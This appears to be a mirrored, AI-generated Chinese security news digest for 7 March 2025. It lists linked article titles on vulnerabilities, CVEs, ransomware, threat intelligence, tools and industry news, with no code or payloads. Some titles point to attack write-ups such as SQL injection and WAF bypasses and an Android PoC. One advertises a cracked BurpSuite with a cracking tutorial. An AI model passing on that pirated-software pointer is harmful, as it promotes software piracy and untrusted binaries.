mirror of
https://github.com/Hxnxe/CyberSentinel-AI.git
synced 2025-11-04 17:13:53 +00:00
3654 lines
157 KiB
Markdown
3654 lines
157 KiB
Markdown
|
|
|
|||
|
|
# 安全资讯日报 2025-03-07
|
|||
|
|
|
|||
|
|
> 本文由AI自动生成,基于对安全相关仓库、CVE和最新安全研究成果的自动化分析。
|
|||
|
|
>
|
|||
|
|
> 更新时间:2025-03-07 22:44:22
|
|||
|
|
|
|||
|
|
<!-- more -->
|
|||
|
|
|
|||
|
|
## 今日资讯
|
|||
|
|
|
|||
|
|
### 🔍 漏洞分析
|
|||
|
|
|
|||
|
|
* [智能网联汽车安全漏洞研究](https://mp.weixin.qq.com/s?__biz=Mzg2NzUzNzk1Mw==&mid=2247497534&idx=3&sn=57d088b781fa5e6fad18fb7c7cd386a2)
|
|||
|
|
* [漏洞通告Kibana 原型污染导致任意代码执行漏洞CVE-2025-25015](https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500835&idx=2&sn=104ab814c07794eb1fae25423b6c8bb9)
|
|||
|
|
* [速修复Kibana 中严重的RCE漏洞](https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247522429&idx=1&sn=7d99cddabc388a3013ca34f627942e4a)
|
|||
|
|
* [Jenkins 修复CSRF和开放重定向等多个漏洞](https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247522429&idx=2&sn=de12997404efb67be58ceb4d9f00b64c)
|
|||
|
|
* [聊热点|大模型微调爆出致命漏洞:可导致模型“黑化”、重大安全威胁!全球近5W个访问管理系统存在严重安全漏洞……](https://mp.weixin.qq.com/s?__biz=MzkxNDY0MjMxNQ==&mid=2247533625&idx=2&sn=4bd892adee78422fd494a37e0c074b38)
|
|||
|
|
* [关于防范大模型工具Ollama未授权访问超危漏洞的风险提示](https://mp.weixin.qq.com/s?__biz=Mzg2NTk3NjczNQ==&mid=2247485776&idx=2&sn=4c475fa89ae4e0a4be798d4f60683d73)
|
|||
|
|
* [网络安全动态 - 2025.03.07(Vim PoC、Elastic RCE)](https://mp.weixin.qq.com/s?__biz=MzU1MzEzMzAxMA==&mid=2247499948&idx=1&sn=54c051d282f1e1152f8ebe7bc56f0032)
|
|||
|
|
* [一次漏洞挖掘过程中的SQL注入浅浅绕过记录](https://mp.weixin.qq.com/s?__biz=Mzk0NzQxNzY2OQ==&mid=2247488752&idx=1&sn=302b8af987a5b79f97d5a22124192ec0)
|
|||
|
|
* [全球云上数据泄露风险分析简报 (第五期):大模型狂欢背后,数据泄露暗潮涌动](https://mp.weixin.qq.com/s?__biz=MjM5ODYyMTM4MA==&mid=2650465913&idx=1&sn=e398541d06bd8fc59e4cdbac75e392d2)
|
|||
|
|
* [微软发现3000个泄露的ASP.NET密钥可被用于代码注入攻击](https://mp.weixin.qq.com/s?__biz=MzI1MTYzMjY1OQ==&mid=2247491002&idx=1&sn=a83a4d0b15a0d1228446607485cd516f)
|
|||
|
|
* [HW 中利用 WAF 缺陷进行绕过](https://mp.weixin.qq.com/s?__biz=MzkzNTYwMTk4Mw==&mid=2247488404&idx=1&sn=866dabd98e99cf9b6b673970c1751342)
|
|||
|
|
* [全球近5W个访问管理系统存在严重安全漏洞](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651315731&idx=3&sn=ebb0b3379d3a800631a81f8124ac649b)
|
|||
|
|
* [研究人员绕过 CrowdStrike Falcon 传感器执行恶意应用程序](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651315731&idx=4&sn=0003fead7ee8619cc6c2921b0b1c4f68)
|
|||
|
|
* [打印机变间谍?揭秘施乐设备中的致命漏洞!](https://mp.weixin.qq.com/s?__biz=MzUzMDUxNTE1Mw==&mid=2247511207&idx=1&sn=58a902a17a6203abce97ae77816a3818)
|
|||
|
|
* [Microsoft Windows 中新的无点击严重漏洞:CVE-2025-21298](https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247528334&idx=1&sn=2501ae9417e237d1ea7c2134cca3faa0)
|
|||
|
|
* [虚拟机逃逸!VMware高危漏洞正被积极利用,国内公网暴露面最大](https://mp.weixin.qq.com/s?__biz=MzI4NDY2MDMwMw==&mid=2247513903&idx=1&sn=308d37d9afc7b9c1bbeee150d0f27040)
|
|||
|
|
* [M-SEC社区2025年度开放漏洞运营](https://mp.weixin.qq.com/s?__biz=Mzk0MzUxOTc2MQ==&mid=2247485055&idx=1&sn=77638dff49f9d9ea6638de5e603b5587)
|
|||
|
|
* [CVE-2025-0087 安卓本地权限提升POC](https://mp.weixin.qq.com/s?__biz=Mzk0MzY3MDE5Mg==&mid=2247484126&idx=1&sn=e3d80ab5d0956e1930d421366c98b27a)
|
|||
|
|
* [通过sql注入来绕过登录验证](https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247497245&idx=1&sn=672c5b4906b143a74b313a1f24b1ced2)
|
|||
|
|
* [vulnhub靶场渗透之Stapler 8000字详解,多种方式任你挑选,sql注入、隧道建立、hadry爆破、内核漏洞利用。](https://mp.weixin.qq.com/s?__biz=Mzk3NTIyOTA0OQ==&mid=2247484141&idx=1&sn=156d01a5ddc9eb22fe1b24e1817e9f31)
|
|||
|
|
* [漏洞预警Arctera InfoScale拒绝服务漏洞CVE-2025-27816](https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489726&idx=1&sn=7f3503b05a7bcf749b1a1ca43ccd3a40)
|
|||
|
|
* [『代码审计』某OA系统.NET代码审计](https://mp.weixin.qq.com/s?__biz=Mzg4NTA0MzgxNQ==&mid=2247489979&idx=1&sn=88d94e11885f3efac340d92e33993e81)
|
|||
|
|
|
|||
|
|
### 🔬 安全研究
|
|||
|
|
|
|||
|
|
* [智能体技术解析——ReACT Agent 深度解析与手搓实现 | Manus 底层原理 | 安全智能体](https://mp.weixin.qq.com/s?__biz=MzI1Mjk2MTM1OQ==&mid=2247485493&idx=1&sn=5ea6602881a78f3f2ec07ff5954cfb31)
|
|||
|
|
* [为什么需要嵌入式固件二进制安全分析](https://mp.weixin.qq.com/s?__biz=MzI3NzUyNjU5Mg==&mid=2247485925&idx=1&sn=7e44548553b025f689745f489faf32fb)
|
|||
|
|
* [解析DeepSeek/AI在JS算法识别领域的创新价值](https://mp.weixin.qq.com/s?__biz=Mzg2NTkwODU3Ng==&mid=2247514956&idx=1&sn=334da086f18d81f0846eae6536d0263a)
|
|||
|
|
* [大模型本地部署的“隐形炸弹”,你的数据安全吗?](https://mp.weixin.qq.com/s?__biz=MzAwMjA5OTY5Ng==&mid=2247525865&idx=1&sn=ea3080c760ca7c13c0677b13880e9906)
|
|||
|
|
* [原创 Paper | 机器学习的线性回归模型](https://mp.weixin.qq.com/s?__biz=MzAxNDY2MTQ2OQ==&mid=2650990768&idx=1&sn=7ee4890159cdb12df16cbaf7d11ad00b)
|
|||
|
|
* [实战记一次SRC未授权系列](https://mp.weixin.qq.com/s?__biz=Mzg4MDg5ODIzNQ==&mid=2247483950&idx=1&sn=033a6ee29c5e37cfea0e65388ad2d7ad)
|
|||
|
|
* [一文理解单片机BootLoader的前世今生](https://mp.weixin.qq.com/s?__biz=MzIzOTc2OTAxMg==&mid=2247551716&idx=3&sn=994125328bbda4c8d440c3cb0c19a706)
|
|||
|
|
* [记录对某985证书站挖掘](https://mp.weixin.qq.com/s?__biz=MzkxNTIwNTkyNg==&mid=2247554107&idx=1&sn=1d53eeadc1908d974baedde2a5f421d9)
|
|||
|
|
* [前沿 | 深度伪造技术的风险与治理](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664237950&idx=7&sn=50a4d13f71c474dd594ea9a5433219c8)
|
|||
|
|
* [Cpython逆向实战分析](https://mp.weixin.qq.com/s?__biz=MzkyNTY3Nzc3Mg==&mid=2247489407&idx=1&sn=d1682bfc9aadb3ec76f788053c4d1571)
|
|||
|
|
* [跟着黑客学习fake captcha](https://mp.weixin.qq.com/s?__biz=MzU4NTg4MzIzNA==&mid=2247484643&idx=1&sn=9ae4fd2d317ca5b1697d983439d71fa3)
|
|||
|
|
* [DeepSeek技术全景解析](https://mp.weixin.qq.com/s?__biz=MjM5OTk4MDE2MA==&mid=2655269387&idx=1&sn=ea9153ab794ebd83ad014cd198176e10)
|
|||
|
|
* [从Manus看网络安全:通用AI智能体重构安全运营](https://mp.weixin.qq.com/s?__biz=MzIyNTA5Mzc2OA==&mid=2651137599&idx=1&sn=c3753b7bb70585b1d4cbee11014e3848)
|
|||
|
|
* [针对AI大模型的资源消耗型攻击分析及防御策略](https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&mid=2247637181&idx=2&sn=8e37224aee6b389e5bb213f08a223ba0)
|
|||
|
|
* [流量检测形同虚设?Merlin Agent远控木马的逃逸高招](https://mp.weixin.qq.com/s?__biz=MzAwNDUzNDExMQ==&mid=2247485252&idx=1&sn=6c78b2bbda9976609ddd4e687b591b92)
|
|||
|
|
* [Phantom-Goblin:隐蔽凭证窃取和 VSCode 隧道利用](https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247528334&idx=3&sn=a5acf4fe80b20c15ff2486d932eb4ae4)
|
|||
|
|
* [Manus Al 研究报告](https://mp.weixin.qq.com/s?__biz=MjM5OTk4MDE2MA==&mid=2655269408&idx=1&sn=a87a2d0ca1015c41d7a082dbfbfa995a)
|
|||
|
|
* [当风云卫拥抱DeepSeek发生了哪些? --从漏洞验证到自动修复的优化之路](https://mp.weixin.qq.com/s?__biz=MzIyODYzNTU2OA==&mid=2247498559&idx=1&sn=af48481d4b2e0ab2512792a0148d1423)
|
|||
|
|
* [JS渗透逆向| V_jstools、Jsrpc、Autodecoder三者强强联动自动加解密](https://mp.weixin.qq.com/s?__biz=Mzg4MDkyMTE4OQ==&mid=2247489050&idx=1&sn=a84961f71a3cf678992cac01babe9579)
|
|||
|
|
|
|||
|
|
### 🎯 威胁情报
|
|||
|
|
|
|||
|
|
* [YouTube 预警:首席执行官的 AI 视频恐成网络钓鱼新工具](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247581434&idx=1&sn=e28e97aa4928f1c09a9d4df442ce566c)
|
|||
|
|
* [新型 Anubis 勒索软件来袭,Windows、Linux、NAS、ESXi x64/x32 环境无一幸免](https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&mid=2247581434&idx=2&sn=8aeae02478ae8c01585ba77095a951ba)
|
|||
|
|
* [印度情报机构人事调整背后的地缘博弈与对我情报行动威胁剖析](https://mp.weixin.qq.com/s?__biz=MzkwNzM0NzA5MA==&mid=2247506687&idx=1&sn=efdee2afe8c0bf5dc1351881acb07777)
|
|||
|
|
* [GenAI失控:隐形威胁下的企业数据保卫战](https://mp.weixin.qq.com/s?__biz=MzA3NTIyNzgwNA==&mid=2650259952&idx=1&sn=e39b425218aa9c0877252e6aadbdb5de)
|
|||
|
|
* [公安部网安局提醒:警惕5种个税汇算骗局;新型勒索团伙SecP0出新招:威胁公开未披露软件漏洞 | 牛览](https://mp.weixin.qq.com/s?__biz=MjM5Njc3NjM4MA==&mid=2651135404&idx=1&sn=ec610c9e2c9d065f22a50abb851c7e68)
|
|||
|
|
* [2025年 20 个知名勒索软件组织名单](https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247496053&idx=1&sn=2132589c269b603d3ad6a1a9dd455334)
|
|||
|
|
* [麒麟勒索软件团伙声称对乌克兰外交部发动黑客攻击](https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247496053&idx=2&sn=2112b2f13b663e8b273ea27a0689fd1b)
|
|||
|
|
* [美国棱镜计划苗头再起](https://mp.weixin.qq.com/s?__biz=MzkzNDIzNDUxOQ==&mid=2247496053&idx=4&sn=0ea648e97293b7954f24860c7a59445c)
|
|||
|
|
* [0307 一周重点威胁情报|天际友盟情报站](https://mp.weixin.qq.com/s?__biz=MzIwNjQ4OTU3NA==&mid=2247510168&idx=1&sn=37cf7900c6da963075532fda4dc47437)
|
|||
|
|
* [Qilin勒索软件团伙声称成功入侵乌克兰外交部,并窃取部分敏感数据](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458590590&idx=3&sn=f2d274fc894ce46592f43ff3e306a077)
|
|||
|
|
* [Elastic Global Threat Report 2024中英文双语版](https://mp.weixin.qq.com/s?__biz=MzkxMzU4ODU2MQ==&mid=2247484135&idx=1&sn=95b741a207ef077ad8e874a41c590531)
|
|||
|
|
* [周刊网空威胁线索监测报告(2025.3.1-2025.3.7)](https://mp.weixin.qq.com/s?__biz=MzkxNzU5MjE0OA==&mid=2247485560&idx=1&sn=5aa871f11f7690e8c5faea4b19d423e8)
|
|||
|
|
* [200G数据被勒索组织窃取,亚信安全《勒索家族和勒索事件监控报告》2025年第7期)](https://mp.weixin.qq.com/s?__biz=MjM5NjY2MTIzMw==&mid=2650621369&idx=1&sn=9d0cb5ae16549383e516bc8fe5e555fd)
|
|||
|
|
* [勒索病毒威胁情报网站](https://mp.weixin.qq.com/s?__biz=MzA4ODEyODA3MQ==&mid=2247490914&idx=1&sn=60417e34b9378618cdc4ffc836863b5e)
|
|||
|
|
* [安全威胁情报周报(2025/03/01-2025/03/07)](https://mp.weixin.qq.com/s?__biz=Mzg4NjYyMzUyNg==&mid=2247491453&idx=1&sn=a66a1c399681c95e12407c8ea66181d3)
|
|||
|
|
* [DeepSeek爆火背后的黑客暗流:三类AI钓鱼攻击技术解析](https://mp.weixin.qq.com/s?__biz=MzkyMjQ5ODk5OA==&mid=2247507960&idx=1&sn=0790d40221cc37e08a52b9836f60b07e)
|
|||
|
|
* [每周勒索威胁摘要](https://mp.weixin.qq.com/s?__biz=MzI5Mzg5MDM3NQ==&mid=2247498363&idx=1&sn=c0b2ddadc44f9ab9843584486e03cc0e)
|
|||
|
|
* [攻防技战术动态一周更新 - 20250303](https://mp.weixin.qq.com/s?__biz=MzkzODc4NjE1OQ==&mid=2247483977&idx=1&sn=70ee8b5024e21b8067f8bb084aa2e9a8)
|
|||
|
|
* [安全圈Qilin 勒索软件团伙宣称入侵乌克兰外交部,敏感数据被窃](https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652068317&idx=3&sn=625fe3e373a2bb5f2651385767cbbeea)
|
|||
|
|
* [安全圈知名黑客组织付费传播恶意软件,第三方安装服务盛行](https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652068317&idx=4&sn=1225f29ac1887eb632b9fb71f590cff1)
|
|||
|
|
* [每周安全速递³³³ | LCRYX 勒索软件再次针对 Windows 系统发起攻击](https://mp.weixin.qq.com/s?__biz=MzI0NDgxMzgxNA==&mid=2247496678&idx=1&sn=fd70056e3d2df2ba32f34eb11320095c)
|
|||
|
|
|
|||
|
|
### 🛠️ 安全工具
|
|||
|
|
|
|||
|
|
* [工具更新2025年最新BurpSuite附破解汉化教程](https://mp.weixin.qq.com/s?__biz=Mzk0OTY2ODE1NA==&mid=2247485126&idx=1&sn=88cd53c2f536f8131ef1d05ce771b9dd)
|
|||
|
|
* [重磅发布梆梆安全发布首款鸿蒙仓颉语言加固产品,筑牢鸿蒙核心代码安全防线](https://mp.weixin.qq.com/s?__biz=MjM5NzE0NTIxMg==&mid=2651135393&idx=1&sn=f0ed72549e2037a1e1746a81312b43a0)
|
|||
|
|
* [工具 | 超快的端口扫描工具](https://mp.weixin.qq.com/s?__biz=MzkxNTY4NTQwMg==&mid=2247484390&idx=1&sn=e9286d04f16d198d570c8a92e7263ec1)
|
|||
|
|
* [IDA Pro 9 SP1 安装和插件配置](https://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458590590&idx=1&sn=a486a8746e896216e849a748351a8ea9)
|
|||
|
|
* [Burp Suite插件专为文件上传漏洞检测设计,提供自动化Fuzz测试,共300+条payload](https://mp.weixin.qq.com/s?__biz=Mzg5NzUyNTI1Nw==&mid=2247497102&idx=1&sn=8ce5b99a9119010caa3b518820877e75)
|
|||
|
|
* [LovelyRitoru续篇-插件流程梳理](https://mp.weixin.qq.com/s?__biz=Mzg3NTg4NTkyMQ==&mid=2247485581&idx=1&sn=0cf71a80fc292d7f8f86808f973d715c)
|
|||
|
|
|
|||
|
|
### 📚 最佳实践
|
|||
|
|
|
|||
|
|
* [OSPF五大报文类型有哪些?](https://mp.weixin.qq.com/s?__biz=MzUyNTExOTY1Nw==&mid=2247528512&idx=1&sn=3d3c83f39b31702e7d00ca6fd7884cae)
|
|||
|
|
* [密评硬核指南:8类安全设备缺一不可](https://mp.weixin.qq.com/s?__biz=MzIwMzIyMjYzNA==&mid=2247518164&idx=1&sn=12327aec6167c61b9690c9ff10cb2ac6)
|
|||
|
|
* [一张图带你看下如果一台服务器离线了,应该怎么排查?](https://mp.weixin.qq.com/s?__biz=MzIyMzIwNzAxMQ==&mid=2649465933&idx=1&sn=2ace97cb6e0e3759d518c5dfef31a953)
|
|||
|
|
* [Android12以上定制版直播机系统为什么卡顿,如何分析卡顿问题,如何解决卡顿问题](https://mp.weixin.qq.com/s?__biz=Mzg2NzUzNzk1Mw==&mid=2247497534&idx=1&sn=e264c6ecc37f401b84bfb55ee9f25514)
|
|||
|
|
* [Android12以上系统深度定制魔改如何解决安全风控问题](https://mp.weixin.qq.com/s?__biz=Mzg2NzUzNzk1Mw==&mid=2247497534&idx=2&sn=cbf132897bfba05bc48adbe832c55ab5)
|
|||
|
|
* [关于防范VMware ESXi等多个产品安全漏洞的风险提示](https://mp.weixin.qq.com/s?__biz=MzA5Nzc4Njg1NA==&mid=2247489209&idx=1&sn=ad8feeb9e718b40ff250683ad980885f)
|
|||
|
|
* [出海网安企业必读:欧盟《新产品责任指令》核心要求](https://mp.weixin.qq.com/s?__biz=MzkxNzA3MTgyNg==&mid=2247537934&idx=1&sn=99f9b0861b0055ea2851c01f173a17d2)
|
|||
|
|
* [关于防范针对DeepSeek本地化部署实施网络攻击的风险提示](https://mp.weixin.qq.com/s?__biz=MzA5Nzc4Njg1NA==&mid=2247489205&idx=1&sn=f0417514d124f9431c30c81304d222e1)
|
|||
|
|
* [网络监控:30分钟快速构建华为无线监控可视化](https://mp.weixin.qq.com/s?__biz=MzIzNjU5NDE2MA==&mid=2247490329&idx=1&sn=0eea402e14a2c26de8f26dd1ce693408)
|
|||
|
|
* [区域 EE 架构的网络安全设计原则](https://mp.weixin.qq.com/s?__biz=MzU2MDk1Nzg2MQ==&mid=2247622178&idx=1&sn=61c0c2fd5f6848b606be89e452224395)
|
|||
|
|
* [保护VCU中的硬件组件和连接启用程序](https://mp.weixin.qq.com/s?__biz=MzU2MDk1Nzg2MQ==&mid=2247622178&idx=3&sn=1525c1d27fce2a2571f7e6fadc7049da)
|
|||
|
|
* [干货丨长输油气管网工控安全防护:策略、实践与展望](https://mp.weixin.qq.com/s?__biz=MzI2MDk2NDA0OA==&mid=2247532389&idx=1&sn=3369308f4696e8b953678a13d59bfa71)
|
|||
|
|
* [一图读懂 | 工业和信息化领域数据安全事件应急预案(试行)](https://mp.weixin.qq.com/s?__biz=MjM5NjA2NzY3NA==&mid=2448684755&idx=1&sn=c185c1e8f4c5f8acf95a679757fcdce2)
|
|||
|
|
* [SoC芯片固件升级的数据安全方法设计和实现](https://mp.weixin.qq.com/s?__biz=MzkwMTMyMDQ3Mw==&mid=2247598057&idx=1&sn=ef229211fdd6680d9993a63c6d025295)
|
|||
|
|
* [渗透测试怎么做?看看大神一次完整的渗透测试实战](https://mp.weixin.qq.com/s?__biz=MzkxMzMyNzMyMA==&mid=2247571554&idx=1&sn=bfea862ef50612c78fd324bd0b64cde8)
|
|||
|
|
* [手把手教大家如何学习deepseek,附教程](https://mp.weixin.qq.com/s?__biz=MzI2OTk4MTA3Ng==&mid=2247497060&idx=1&sn=372c80adc03bf275106aaafab652013b)
|
|||
|
|
* [攻防领域考证指南:从入门到高级](https://mp.weixin.qq.com/s?__biz=MzU4MjUxNjQ1Ng==&mid=2247522220&idx=1&sn=625a299ccd415dd54f5b7f03703c5320)
|
|||
|
|
* [二维码钓鱼攻击的兴起:诈骗者如何利用二维码及如何防范](https://mp.weixin.qq.com/s?__biz=MzkwMTQyODI4Ng==&mid=2247496048&idx=2&sn=cd794e1cad078cf03648ce237e4f0e9a)
|
|||
|
|
* [修改Chrome的ExtensionManifestV2Availability值](https://mp.weixin.qq.com/s?__biz=MzkxODM5NDA3Nw==&mid=2247484491&idx=1&sn=0ca4c17116b3f63a3331f4d89aa6b857)
|
|||
|
|
* [一次性讲清楚OAuth2.0认证一)](https://mp.weixin.qq.com/s?__biz=MzI0MzM3NTQ5MA==&mid=2247484303&idx=1&sn=f9b080ba585adfef44cba4b1bc0200ae)
|
|||
|
|
* [2025阿里白帽大会:共筑网络安全新生态](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651315731&idx=1&sn=f81f600c82bf6bba17a98570a24df2aa)
|
|||
|
|
* [网络安全必备!雷池WAF动态防护,轻松拦截DDoS与爬虫攻击](https://mp.weixin.qq.com/s?__biz=MzkxNTU5NTI1Ng==&mid=2247487726&idx=1&sn=d1fd6754bed55ef5669a7dc4a880d177)
|
|||
|
|
* [不留痕迹地使用 RDP:MSTSC 公共模式](https://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247528334&idx=2&sn=1bafdf8932f8fb43f1a8c1ef823ceefb)
|
|||
|
|
* [关于防范网站被攻击网页被篡改的风险提示](https://mp.weixin.qq.com/s?__biz=MzA5Nzc4Njg1NA==&mid=2247489216&idx=1&sn=e3514175703ee73257ae42a402765412)
|
|||
|
|
|
|||
|
|
### 🍉 吃瓜新闻
|
|||
|
|
|
|||
|
|
* [留言板遭遇新型视频通话诈骗](https://mp.weixin.qq.com/s?__biz=MzAxNjg3MjczOA==&mid=2247486505&idx=1&sn=8ceb584df15822963fdae8750de56d53)
|
|||
|
|
* [马斯克X 上表示支持美国退出北约和联合国:全球多方反应及对我影响和应对策略分析](https://mp.weixin.qq.com/s?__biz=MzkwNzM0NzA5MA==&mid=2247506687&idx=2&sn=df530548c0c681f7b6935a6a87229e4d)
|
|||
|
|
* [网安资讯 | 公安机关破获多起摆拍违法典型案例](https://mp.weixin.qq.com/s?__biz=Mzg3NTEyMzU4OA==&mid=2247513502&idx=1&sn=8398bf0b2f28c8b506cb2969b96c08c2)
|
|||
|
|
* [GitHub恶意广告入侵盗版视频网站,已影响全球百万台设备](https://mp.weixin.qq.com/s?__biz=Mzk0MDYwMjE3OQ==&mid=2247486271&idx=1&sn=d71165aee43c08d40ee9559cd13537d4)
|
|||
|
|
* [信息安全漏洞周报第012期](https://mp.weixin.qq.com/s?__biz=MzA4MDk4NTIwMg==&mid=2454064019&idx=1&sn=97243801ec70676c951e28fb2783806a)
|
|||
|
|
* [火绒安全周报足球俱乐部利兹联遭网络攻击/百万安卓电视设备感染病毒](https://mp.weixin.qq.com/s?__biz=MzI3NjYzMDM1Mg==&mid=2247524533&idx=1&sn=3d5a6e22766fd00c827f481bbb1841ce)
|
|||
|
|
* [文章转载朝鲜黑客洗白超70亿人民币!Bybit史上最大加密货币盗窃案进展曝光](https://mp.weixin.qq.com/s?__biz=MzkyOTQ0MjE1NQ==&mid=2247498218&idx=1&sn=1aad33b3b59520012cbbb3ad34bac185)
|
|||
|
|
* [网安事件速递|家中摄像头暗藏隐私泄露风险;捏造“80后死亡率 5.2%”、借机卖保健品,网警依法查处多人](https://mp.weixin.qq.com/s?__biz=MzkwNDcyODgwOQ==&mid=2247486823&idx=1&sn=d5b011350e1f003b8e6c7d7d772091fa)
|
|||
|
|
* [业界动态国家发展改革委郑栅洁主任在十四届全国人大三次会议经济主题记者会上答记者问](https://mp.weixin.qq.com/s?__biz=MzA3NzgzNDM0OQ==&mid=2664993740&idx=1&sn=9cf1b30a2af41fd46813a530d5d13867)
|
|||
|
|
* [业界动态国家数据局数字科技和基础设施建设司 全国数据标准化技术委员会秘书处联合发布国家数据基础设施建设有关技术文件](https://mp.weixin.qq.com/s?__biz=MzA3NzgzNDM0OQ==&mid=2664993740&idx=2&sn=8be0fe2b1771a6ba6cc58782b3389301)
|
|||
|
|
* [业界动态Gartner发布2025年网络安全六大预测](https://mp.weixin.qq.com/s?__biz=MzA3NzgzNDM0OQ==&mid=2664993740&idx=3&sn=ed8464015ecd65a5de3f2d6cd901c5ec)
|
|||
|
|
* [安全简讯(2025.03.07)](https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500835&idx=1&sn=ef4786b82fb3514277a54eae6c9d4b47)
|
|||
|
|
* [接连被制裁,俄罗斯交易平台 Garantex 这三年做了什么?](https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&mid=2247501389&idx=1&sn=315f4fbdfb151b296e2df92f6becbe3b)
|
|||
|
|
* [短短48小时内的政策惊天大逆转!美国汽车行业获关税豁免!](https://mp.weixin.qq.com/s?__biz=MzIzOTc2OTAxMg==&mid=2247551716&idx=1&sn=d3ab1197195c3e43240b60d097222eb2)
|
|||
|
|
* [网安周讯 | 极氪最高悬赏500万元,打击恶意攻击行为!(三月第1期)](https://mp.weixin.qq.com/s?__biz=Mzg4MjQ4MjM4OA==&mid=2247524040&idx=1&sn=abc4ab428977ccae87d7c8ff2114deb3)
|
|||
|
|
* [网络安全信息与动态周报2025年第9期(2月24日-3月2日)](https://mp.weixin.qq.com/s?__biz=Mzk0NjMxNTgyOQ==&mid=2247484548&idx=1&sn=d516b460b1f1eead00fd6c7d56dee43b)
|
|||
|
|
* [ISO/PWI 25534-1《产品数字护照DPP 第1部分:概述与基本原则》国际标准项目启动会召开](https://mp.weixin.qq.com/s?__biz=MzU1OTUxNTI1NA==&mid=2247592711&idx=2&sn=c55e9378562e938876fea4a83d3bfd26)
|
|||
|
|
* [退税季陷阱多!遇到这些链接,你的钱包可能不保!](https://mp.weixin.qq.com/s?__biz=MzkzNjIzMjM5Ng==&mid=2247490255&idx=1&sn=d46384f64767ab1bec19b11d0206de3b)
|
|||
|
|
* [国际视野美国国家标准与技术研究院发布《使用业务影响分析来指导风险优先排序和响应》报告](https://mp.weixin.qq.com/s?__biz=MzIyMjQwMTQ3Ng==&mid=2247491130&idx=1&sn=de5da1774e847274015b8207870cc146)
|
|||
|
|
* [国际视野欧盟网络安全局发布NIS360报告,全面审视 NIS2 行业的网络安全成熟度和与关键性](https://mp.weixin.qq.com/s?__biz=MzIyMjQwMTQ3Ng==&mid=2247491130&idx=2&sn=1cf8e1d79f847179cc8e1c3fedc8be98)
|
|||
|
|
* [安全资讯汇总:2025.3.3-2025.3.7](https://mp.weixin.qq.com/s?__biz=MzA4MTE0MTEwNQ==&mid=2668670112&idx=1&sn=a7b12672595ca42f280481a19c42b1d4)
|
|||
|
|
* [中国信通院安全所&青藤云安全联合牵头:容器安全评价新标准正式发布](https://mp.weixin.qq.com/s?__biz=MzAwNDE4Mzc1NA==&mid=2650850005&idx=1&sn=027af37090e7fd0f35de34a8a03cbe11)
|
|||
|
|
* [全国政协委员郑春阳:从立法层面筑牢个人信息安全根基](https://mp.weixin.qq.com/s?__biz=MzIxMDIwODM2MA==&mid=2653931658&idx=1&sn=7149c0d803fd740de682862740850bc9)
|
|||
|
|
* [又有6款App因侵害用户权益被通报](https://mp.weixin.qq.com/s?__biz=MzIxMDIwODM2MA==&mid=2653931658&idx=2&sn=ba1e2275b7b43921a17395bc05b0867d)
|
|||
|
|
* [荐读丨《科学数据安全分类分级指南》等5项国家标准正式发布](https://mp.weixin.qq.com/s?__biz=MzI2MDk2NDA0OA==&mid=2247532389&idx=2&sn=09847580994700ebe888fd5628e9fd6c)
|
|||
|
|
* [实力认证!360入选国家工业信息安全漏洞库技术组成员单位](https://mp.weixin.qq.com/s?__biz=MzA4MTg0MDQ4Nw==&mid=2247579828&idx=1&sn=ae2245f2dadec2e5b2e181707bda93ef)
|
|||
|
|
* [两会聚焦“人工智能+”,为网络安全注入新动能/网络安全建设的新挑战](https://mp.weixin.qq.com/s?__biz=Mzg2NTk3NjczNQ==&mid=2247485776&idx=1&sn=ae5c2a832dd68f7e92b7403dc04ce383)
|
|||
|
|
* [《关键信息基础设施安全服务能力要求、供应链安全要求、测评估能力要求》等3项团体标准发布](https://mp.weixin.qq.com/s?__biz=MjM5NjA2NzY3NA==&mid=2448684755&idx=2&sn=34c43bd13cb12881113c4712ba918605)
|
|||
|
|
* [专家解读 | 胡坚波:国家公共数据资源登记平台正式上线 数据要素价值化迈出重要一步](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664237950&idx=2&sn=8bd256bda9cb245ebebca8130f2cba98)
|
|||
|
|
* [关注 | 国家数据局、全国数标委联合发布国家数据基础设施建设有关技术文件](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664237950&idx=3&sn=a8b002c2f527ee19792bf02f98a2db02)
|
|||
|
|
* [王毅:临近边界的缅北地区电诈园区已全部清除](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664237950&idx=4&sn=06dadb9436db2dc0837b269962d6edf4)
|
|||
|
|
* [关注 | 国家计算机病毒应急处理中心监测发现15款违规移动应用](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664237950&idx=5&sn=23beff35da5698b743622e882a8aa25b)
|
|||
|
|
* [国际 | 美陆军加速网络部队建设](https://mp.weixin.qq.com/s?__biz=MzA5MzE5MDAzOA==&mid=2664237950&idx=6&sn=9c27124c25adae8328b817d8d26ff066)
|
|||
|
|
